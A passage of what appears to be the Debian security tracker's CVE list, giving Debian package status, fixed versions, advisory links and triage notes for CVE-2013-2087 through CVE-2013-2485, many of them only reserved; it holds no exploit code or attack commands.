https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8364 NOTE: Versions affected: 1.8.0 to 1.8.5 NOTE: Not suitable for code injection CVE-2013-2485 (The FCSP dissector in Wireshark 1.6.x before 1.6.14 and 1.8.x before ...) - wireshark 1.8.6-1 (unimportant) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-20.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8359 NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13 NOTE: Not suitable for code injection CVE-2013-2484 (The CIMD dissector in Wireshark 1.6.x before 1.6.14 and 1.8.x before ...) {DSA-2644-1} - wireshark 1.8.2-5 [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-19.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8346 NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13 CVE-2013-2483 (The acn_add_dmp_data function in epan/dissectors/packet-acn.c in the ...) {DSA-2644-1} - wireshark 1.8.2-5 (unimportant) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-18.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8340 NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13 NOTE: Not suitable for code injection CVE-2013-2482 (The AMPQ dissector in Wireshark 1.6.x before 1.6.14 and 1.8.x before ...) - wireshark 1.8.6-1 (unimportant) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-17.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8337 NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13 NOTE: Not suitable for code injection CVE-2013-2481 (Integer signedness error in the dissect_mount_dirpath_call function in ...) {DSA-2644-1} - wireshark 1.8.2-5 (unimportant) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-16.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8335 NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13 NOTE: Not suitable for code injection CVE-2013-2480 (The RTPS and RTPS2 dissectors in Wireshark 1.6.x before 1.6.14 and ...) {DSA-2644-1} - wireshark 1.8.2-5 [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-15.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8332 NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13 CVE-2013-2479 (The dissect_mpls_echo_tlv_dd_map function in ...) - wireshark 1.8.6-1 (unimportant) [squeeze] - wireshark (only affecting 1.8.x) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-14.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8039 NOTE: Versions affected: 1.8.0 to 1.8.5 NOTE: Not suitable for code injection CVE-2013-2478 (The dissect_server_info function in epan/dissectors/packet-ms-mms.c in ...) {DSA-2644-1} - wireshark 1.8.2-5 [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-13.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8382 NOTE: announce mentions: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13 CVE-2013-2477 (The CSN.1 dissector in Wireshark 1.8.x before 1.8.6 does not properly ...) - wireshark 1.8.2-5 [squeeze] - wireshark (only affecting 1.8.x) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-12.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8383 NOTE: Versions affected: 1.8.0 to 1.8.5 CVE-2013-2476 (The dissect_hartip function in epan/dissectors/packet-hartip.c in the ...) - wireshark 1.8.6-1 (unimportant) [squeeze] - wireshark (only affecting 1.8.x) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-11.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8360 NOTE: Versions affected: 1.8.0 to 1.8.5 NOTE: Not suitable for code injection CVE-2013-2475 (The TCP dissector in Wireshark 1.8.x before 1.8.6 allows remote ...) - wireshark 1.8.2-5 [squeeze] - wireshark (only affecting 1.8.x) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-10.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8274 NOTE: Versions affected: 1.8.0 to 1.8.5 CVE-2013-2474 RESERVED CVE-2013-2473 RESERVED CVE-2013-2472 RESERVED CVE-2013-2471 RESERVED CVE-2013-2470 RESERVED CVE-2013-2469 RESERVED CVE-2013-2468 RESERVED CVE-2013-2467 RESERVED CVE-2013-2466 RESERVED CVE-2013-2465 RESERVED CVE-2013-2464 RESERVED CVE-2013-2463 RESERVED CVE-2013-2462 RESERVED CVE-2013-2461 RESERVED CVE-2013-2460 RESERVED CVE-2013-2459 RESERVED CVE-2013-2458 RESERVED CVE-2013-2457 RESERVED CVE-2013-2456 RESERVED CVE-2013-2455 RESERVED CVE-2013-2454 RESERVED CVE-2013-2453 RESERVED CVE-2013-2452 RESERVED CVE-2013-2451 RESERVED CVE-2013-2450 RESERVED CVE-2013-2449 RESERVED CVE-2013-2448 RESERVED CVE-2013-2447 RESERVED CVE-2013-2446 RESERVED CVE-2013-2445 RESERVED CVE-2013-2444 RESERVED CVE-2013-2443 RESERVED CVE-2013-2442 RESERVED CVE-2013-2441 (Unspecified vulnerability in the Agile EDM component in Oracle Supply ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2013-2440 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-2439 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Installation performed differently for Linux distros) - openjdk-7 (Installation performed differently for Linux distros) CVE-2013-2438 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-2437 RESERVED CVE-2013-2436 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 (Only affects Java7) CVE-2013-2435 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-2434 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Only affects Java 7) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2013-2433 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-2432 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2013-2431 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 (Only affects Java7) CVE-2013-2430 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-2429 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-2428 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-2427 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-2426 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 (Only affects Java 7) CVE-2013-2425 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Only applies to Java 7) - openjdk-7 (Installation performed differently for Linux distros) CVE-2013-2424 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-2423 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 (Only applies to Java 7) CVE-2013-2422 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-2421 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 (Only affects Java 7) CVE-2013-2420 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-2419 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-2418 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-2417 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-2416 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Only affects Java 7) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-2415 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Only affects Java 7) - openjdk-6 6b27-1.12.5-1 CVE-2013-2414 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-2413 (Unspecified vulnerability in the Siebel Enterprise Application ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-2412 RESERVED CVE-2013-2411 (Unspecified vulnerability in the Primavera P6 Enterprise Project ...) NOT-FOR-US: Oracle Primavera Products CVE-2013-2410 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-2409 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-2408 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-2407 RESERVED CVE-2013-2406 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-2405 (Unspecified vulnerability in the Primavera P6 Enterprise Project ...) NOT-FOR-US: Oracle Primavera Products CVE-2013-2404 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-2403 (Unspecified vulnerability in the Siebel Enterprise Application ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-2402 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-2401 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-2400 RESERVED CVE-2013-2399 (Unspecified vulnerability in the Siebel Call Center component in ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-2398 (Unspecified vulnerability in the Siebel UI Framework component in ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-2397 (Unspecified vulnerability in the Oracle Retail Central Office ...) NOT-FOR-US: Oracle Industry Applications CVE-2013-2396 (Unspecified vulnerability in the Oracle Applications Manager component ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-2395 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows ...) - mysql-5.5 (Only affects MySQL 5.6) - mysql-5.1 (Only affects MySQL 5.6) CVE-2013-2394 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2013-2393 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-2392 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 ...) {DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 CVE-2013-2391 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 ...) {DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 CVE-2013-2390 (Unspecified vulnerability in the Oracle WebLogic Server component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-2389 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 ...) {DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 CVE-2013-2388 (Unspecified vulnerability in the Oracle Applications Technology Stack ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-2387 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-2386 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-2385 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-2384 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-2383 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-2382 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-2381 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows ...) - mysql-5.1 (Only affects MySQL 5.6) - mysql-5.5 (Only affects MySQL 5.6) CVE-2013-2380 (Unspecified vulnerability in the Oracle JRockit component in Oracle ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-2379 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-2378 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 ...) - mysql-5.5 5.5.30+dfsg-1 - mysql-5.1 CVE-2013-2377 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-2376 (Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and ...) {DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 (Only affects MySQL 5.5 and 5.6) CVE-2013-2375 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 ...) {DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 CVE-2013-2374 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-2373 (The Engine in TIBCO Spotfire Web Player 3.3.x before 3.3.3, 4.0.x ...) NOT-FOR-US: TIBCO Spotfire Web Player CVE-2013-2372 (Cross-site scripting (XSS) vulnerability in the Engine in TIBCO ...) NOT-FOR-US: TIBCO Spotfire Web Player CVE-2013-2371 (The Web API in the Statistics Server in TIBCO Spotfire Statistics ...) NOT-FOR-US: TIBCO Spotfire Statistics CVE-2013-2370 RESERVED CVE-2013-2369 RESERVED CVE-2013-2368 RESERVED CVE-2013-2367 RESERVED CVE-2013-2366 RESERVED CVE-2013-2365 RESERVED CVE-2013-2364 RESERVED CVE-2013-2363 RESERVED CVE-2013-2362 RESERVED CVE-2013-2361 RESERVED CVE-2013-2360 RESERVED CVE-2013-2359 RESERVED CVE-2013-2358 RESERVED CVE-2013-2357 RESERVED CVE-2013-2356 RESERVED CVE-2013-2355 RESERVED CVE-2013-2354 RESERVED CVE-2013-2353 RESERVED CVE-2013-2352 RESERVED CVE-2013-2351 RESERVED CVE-2013-2350 RESERVED CVE-2013-2349 RESERVED CVE-2013-2348 RESERVED CVE-2013-2347 RESERVED CVE-2013-2346 RESERVED CVE-2013-2345 RESERVED CVE-2013-2344 RESERVED CVE-2013-2343 RESERVED CVE-2013-2342 RESERVED CVE-2013-2341 RESERVED CVE-2013-2340 RESERVED CVE-2013-2339 RESERVED CVE-2013-2338 RESERVED CVE-2013-2337 RESERVED CVE-2013-2336 RESERVED CVE-2013-2335 RESERVED CVE-2013-2334 RESERVED CVE-2013-2333 RESERVED CVE-2013-2332 RESERVED CVE-2013-2331 RESERVED CVE-2013-2330 RESERVED CVE-2013-2329 RESERVED CVE-2013-2328 RESERVED CVE-2013-2327 RESERVED CVE-2013-2326 RESERVED CVE-2013-2325 RESERVED CVE-2013-2324 RESERVED CVE-2013-2323 RESERVED CVE-2013-2322 RESERVED CVE-2013-2321 (Cross-site scripting (XSS) vulnerability in HP Service Manager Web ...) NOT-FOR-US: HP Service Manager CVE-2013-2320 RESERVED CVE-2013-2319 RESERVED CVE-2013-2318 RESERVED CVE-2013-2317 RESERVED CVE-2013-2316 RESERVED CVE-2013-2315 RESERVED CVE-2013-2314 RESERVED CVE-2013-2313 RESERVED CVE-2013-2312 RESERVED CVE-2013-2311 RESERVED CVE-2013-2310 RESERVED CVE-2013-2309 RESERVED CVE-2013-2308 (The (1) OWA Helper and (2) OSG Lite programs in SoftBank Online ...) NOT-FOR-US: SoftBank Online Service Gate CVE-2013-2307 (The Yahoo! Browser application before 1.4.3 for Android allows remote ...) NOT-FOR-US: Yahoo! Browser application for Android CVE-2013-2306 (The jigbrowser+ application before 1.6.4 for Android does not properly ...) NOT-FOR-US: jigbrowser+ application for Android CVE-2013-2305 (Cross-site request forgery (CSRF) vulnerability in Cybozu Office ...) NOT-FOR-US: Cybozu CVE-2013-2304 (The Sleipnir Mobile application 2.8.0 and earlier and Sleipnir Mobile ...) NOT-FOR-US: Sleipnir CVE-2013-2303 (Sleipnir 4.0.0.4000 and earlier on Windows allows remote attackers to ...) NOT-FOR-US: Sleipnir CVE-2013-2302 (TransWARE Active! mail 6, when an external public interface is used, ...) NOT-FOR-US: TransWARE Active! mail CVE-2013-2301 (The OMRON OpenWnn application before 1.3.6 for Android uses weak ...) NOT-FOR-US: OpenWnn application CVE-2013-2300 (The FlickWnn (aka OpenWnn/Flick support) application 2.02 and earlier ...) NOT-FOR-US: FlickWnn Android App CVE-2013-2299 RESERVED CVE-2013-2298 RESERVED - boinc 7.0.65+dfsg-1 (low) [wheezy] - boinc (Minor issue, only exploitable by a rogue BOINC server) [squeeze] - boinc (Minor issue, only exploitable by a rogue BOINC server) NOTE: http://boinc.berkeley.edu/gitweb/?p=boinc-v2.git;a=commitdiff;h=2fea03824925cbcb976f4191f4d8321e41a4d95b CVE-2013-2297 RESERVED CVE-2013-2296 [Walrus does not check authorization for some operations] RESERVED - eucalyptus (bug #707592) NOTE: commit: https://github.com/eucalyptus/eucalyptus/commit/da7bb8b7c15d453e62df38eff5c12d0998e6eab1 NOTE: https://eucalyptus.atlassian.net/browse/EUCA-3074 CVE-2013-2295 RESERVED CVE-2013-2294 RESERVED NOT-FOR-US: ViewGit CVE-2013-2293 (The CTransaction::FetchInputs method in bitcoind and Bitcoin-Qt before ...) - bitcoin 0.8.1-2 (bug #705265) CVE-2013-2292 (bitcoind and Bitcoin-Qt 0.8.0 and earlier allow remote attackers to ...) - bitcoin CVE-2013-2291 RESERVED CVE-2013-2290 (Cross-site scripting (XSS) vulnerability in the dashboard of the ...) NOT-FOR-US: Aruba Networks ArubaOS CVE-2013-2289 RESERVED CVE-2013-2288 RESERVED CVE-2013-2287 RESERVED CVE-2013-2286 RESERVED CVE-2013-2285 RESERVED CVE-2013-2284 RESERVED CVE-2013-2283 RESERVED CVE-2013-2282 RESERVED CVE-2013-2281 RESERVED CVE-2013-2280 RESERVED CVE-2013-2279 (CA SiteMinder Federation (FSS) 12.5, 12.0, and r6; Federation ...) NOT-FOR-US: CA SiteMinder CVE-2013-2278 RESERVED CVE-2013-2277 (The ff_h264_decode_seq_parameter_set function in h264_ps.c in ...) - ffmpeg - libav 6:0.8.6-1 (bug #703200) CVE-2013-2276 (The avcodec_decode_audio4 function in utils.c in libavcodec in FFmpeg ...) - ffmpeg (Doesn't affect libav, specific to current ffmpeg) - libav (Doesn't affect libav, specific to current ffmpeg) CVE-2013-2275 (The default configuration for puppet masters 0.25.0 and later in ...) {DSA-2643-1} - puppet 2.7.18-3 CVE-2013-2274 (Puppet 2.6.x before 2.6.18 and Puppet Enterprise 1.2.x before 1.2.7 ...) {DSA-2643-1} - puppet 2.7-1 NOTE: Only affects puppet 2.6.x CVE-2013-2273 (bitcoind and Bitcoin-Qt before 0.4.9rc1, 0.5.x before 0.5.8rc1, 0.6.0 ...) - bitcoin CVE-2013-2272 (The penny-flooding protection mechanism in the CTxMemPool::accept ...) - bitcoin 0.8.1-2 (bug #705266) CVE-2013-2271 RESERVED CVE-2013-2270 RESERVED CVE-2013-2269 RESERVED CVE-2013-2268 (Unspecified vulnerability in the MathML implementation in WebKit in ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser (Vulnerable code not present) NOTE: MathML added in chromium 24.x, disabled again in 25.x CVE-2012-6534 (Novell Sentinel Log Manager before 1.2.0.3 allows remote attackers to ...) NOT-FOR-US: Novell Sentinel Log Manager CVE-2013-2267 RESERVED CVE-2013-2266 (libdns in ISC BIND 9.7.x and 9.8.x before 9.8.4-P2, 9.8.5 before ...) {DSA-2656-1} - bind9 1:9.8.4.dfsg.P1-6+nmu1 (bug #704174) CVE-2013-2265 RESERVED CVE-2013-2264 (The SIP channel driver in Asterisk Open Source 1.8.x before 1.8.20.2, ...) - asterisk 1:1.8.13.1~dfsg-2 (low; bug #704114) NOTE: https://issues.asterisk.org/jira/browse/ASTERISK-21013 CVE-2013-2263 (Unspecified vulnerability in Citrix Access Gateway Standard Edition ...) NOT-FOR-US: Citrix Access Gateway CVE-2013-2262 RESERVED CVE-2013-2261 RESERVED CVE-2013-2260 RESERVED CVE-2013-2259 RESERVED CVE-2013-2258 RESERVED CVE-2013-2257 RESERVED CVE-2013-2256 RESERVED CVE-2013-2255 RESERVED CVE-2013-2254 RESERVED CVE-2013-2253 RESERVED CVE-2013-2252 RESERVED CVE-2013-2251 RESERVED CVE-2013-2250 RESERVED CVE-2013-2249 RESERVED CVE-2013-2248 RESERVED CVE-2013-2247 RESERVED CVE-2013-2246 RESERVED CVE-2013-2245 RESERVED CVE-2013-2244 RESERVED CVE-2013-2243 RESERVED CVE-2013-2242 RESERVED CVE-2013-2241 RESERVED CVE-2013-2240 RESERVED CVE-2013-2239 RESERVED CVE-2013-2238 RESERVED CVE-2013-2237 RESERVED CVE-2013-2236 RESERVED CVE-2013-2235 RESERVED CVE-2013-2234 RESERVED CVE-2013-2233 RESERVED CVE-2013-2232 RESERVED CVE-2013-2231 RESERVED CVE-2013-2230 RESERVED CVE-2013-2229 RESERVED CVE-2013-2228 RESERVED CVE-2013-2227 RESERVED CVE-2013-2226 RESERVED CVE-2013-2225 RESERVED CVE-2013-2224 RESERVED CVE-2013-2223 RESERVED CVE-2013-2222 RESERVED CVE-2013-2221 RESERVED CVE-2013-2220 RESERVED CVE-2013-2219 RESERVED CVE-2013-2218 RESERVED CVE-2013-2217 RESERVED CVE-2013-2216 RESERVED CVE-2013-2215 RESERVED CVE-2013-2214 RESERVED CVE-2013-2213 RESERVED CVE-2013-2212 RESERVED CVE-2013-2211 RESERVED CVE-2013-2210 RESERVED CVE-2013-2209 RESERVED CVE-2013-2208 RESERVED CVE-2013-2207 RESERVED CVE-2013-2206 RESERVED CVE-2013-2205 RESERVED CVE-2013-2204 RESERVED CVE-2013-2203 RESERVED CVE-2013-2202 RESERVED CVE-2013-2201 RESERVED CVE-2013-2200 RESERVED CVE-2013-2199 RESERVED CVE-2013-2198 RESERVED CVE-2013-2197 RESERVED CVE-2013-2196 RESERVED CVE-2013-2195 RESERVED CVE-2013-2194 RESERVED CVE-2013-2193 RESERVED CVE-2013-2192 RESERVED CVE-2013-2191 RESERVED CVE-2013-2190 RESERVED CVE-2013-2189 RESERVED CVE-2013-2188 RESERVED CVE-2013-2187 RESERVED CVE-2013-2186 RESERVED CVE-2013-2185 RESERVED CVE-2013-2184 RESERVED CVE-2013-2183 RESERVED CVE-2013-2182 RESERVED CVE-2013-2181 RESERVED CVE-2013-2180 RESERVED CVE-2013-2179 RESERVED CVE-2013-2178 RESERVED CVE-2013-2177 RESERVED CVE-2013-2176 RESERVED CVE-2013-2175 RESERVED CVE-2013-2174 RESERVED CVE-2013-2173 RESERVED CVE-2013-2172 RESERVED CVE-2013-2171 RESERVED CVE-2013-2170 RESERVED CVE-2013-2169 RESERVED CVE-2013-2168 RESERVED CVE-2013-2167 RESERVED CVE-2013-2166 RESERVED CVE-2013-2165 RESERVED CVE-2013-2164 RESERVED CVE-2013-2163 RESERVED CVE-2013-2162 RESERVED CVE-2013-2161 RESERVED CVE-2013-2160 RESERVED CVE-2013-2159 RESERVED CVE-2013-2158 RESERVED CVE-2013-2157 RESERVED CVE-2013-2156 RESERVED CVE-2013-2155 RESERVED CVE-2013-2154 RESERVED CVE-2013-2153 RESERVED CVE-2013-2152 RESERVED CVE-2013-2151 RESERVED CVE-2013-2150 RESERVED CVE-2013-2149 RESERVED CVE-2013-2148 RESERVED CVE-2013-2147 RESERVED CVE-2013-2146 RESERVED CVE-2013-2145 RESERVED CVE-2013-2144 RESERVED CVE-2013-2143 RESERVED CVE-2013-2142 RESERVED CVE-2013-2141 RESERVED CVE-2013-2140 RESERVED CVE-2013-2139 RESERVED CVE-2013-2138 RESERVED CVE-2013-2137 RESERVED CVE-2013-2136 RESERVED CVE-2013-2135 RESERVED CVE-2013-2134 RESERVED CVE-2013-2133 RESERVED CVE-2013-2132 RESERVED CVE-2013-2131 RESERVED CVE-2013-2130 RESERVED CVE-2013-2129 RESERVED CVE-2013-2128 RESERVED CVE-2013-2127 RESERVED CVE-2013-2126 RESERVED CVE-2013-2125 RESERVED - opensmtpd (bug #706985) CVE-2013-2124 RESERVED CVE-2013-2123 RESERVED CVE-2013-2122 RESERVED CVE-2013-2121 RESERVED CVE-2013-2120 RESERVED CVE-2013-2119 RESERVED CVE-2013-2118 RESERVED CVE-2013-2117 RESERVED CVE-2013-2116 RESERVED CVE-2013-2115 RESERVED CVE-2013-2114 RESERVED CVE-2013-2113 RESERVED CVE-2013-2112 RESERVED CVE-2013-2111 RESERVED CVE-2013-2110 RESERVED CVE-2013-2109 RESERVED NOT-FOR-US: WordPress plugin wp-cleanfix CVE-2013-2108 RESERVED NOT-FOR-US: WordPress plugin wp-cleanfix CVE-2013-2107 RESERVED NOT-FOR-US: WordPress plugin mail-on-update CVE-2013-2106 [Authentication credential disclosure] RESERVED - webauth (vulnerable code only in 4.4.1 up to 4.5.2) CVE-2013-2105 RESERVED NOT-FOR-US: Show In Browser Ruby Gem CVE-2013-2104 RESERVED CVE-2013-2103 RESERVED CVE-2013-2102 RESERVED CVE-2013-2101 RESERVED CVE-2013-2100 RESERVED NOT-FOR-US: Gentoo Portage binary package installer CVE-2013-2099 [ssl.match_hostname denial of service] RESERVED - python2.7 (low; bug #709066) [wheezy] - python2.7 (Minor issue) - linkchecker (low; bug #709067) [squeeze] - linkchecker (Minor issue) [wheezy] - linkchecker (Minor issue) - python3.2 (low; bug #708530) - python3.3 (low; bug #708530) - bzr 2.6.0~bzr6574-1 (low; bug #709068) [squeeze] - bzr (Minor issue) [wheezy] - bzr (Minor issue) - python-urllib3 1.6-2 (low; bug #709070) [wheezy] - python-urllib3 (Minor issue) - python-tornado (low; bug #709069) [squeeze] - python-tornado (Minor issue) [wheezy] - python-tornado (Minor issue) - w3af 2.6.0~bzr6574-1 (low; bug #709068) [squeeze] - w3af (Minor issue) [wheezy] - w3af (Minor issue) CVE-2013-2098 RESERVED NOTE: http://www.openwall.com/lists/oss-security/2013/05/16/5 TODO: check CVE-2013-2097 [zPanel themes remote command execution as root] RESERVED NOT-FOR-US: zPanel CVE-2013-2096 [fails to verify image virtual size] RESERVED - nova TODO: check CVE-2013-2095 RESERVED CVE-2013-2094 (The perf_swevent_init function in kernel/events/core.c in the Linux ...) {DSA-2669-1} - linux 3.8.11-1 [squeeze] - linux-2.6 (Vulnerable code not present) CVE-2013-2093 RESERVED - dolibarr (bug #634783) CVE-2013-2092 RESERVED - dolibarr (bug #634783) CVE-2013-2091 RESERVED - dolibarr (bug #634783) CVE-2013-2090 [Remote command Injection] RESERVED NOT-FOR-US: Creme Fraiche Ruby Gem CVE-2013-2089 [owncloud: oC-SA-2013-026] RESERVED - owncloud (Only affects 5.0.x) CVE-2013-2088 RESERVED CVE-2013-2087 [gallery: multiple xss] RESERVED - gallery TODO: check if affects 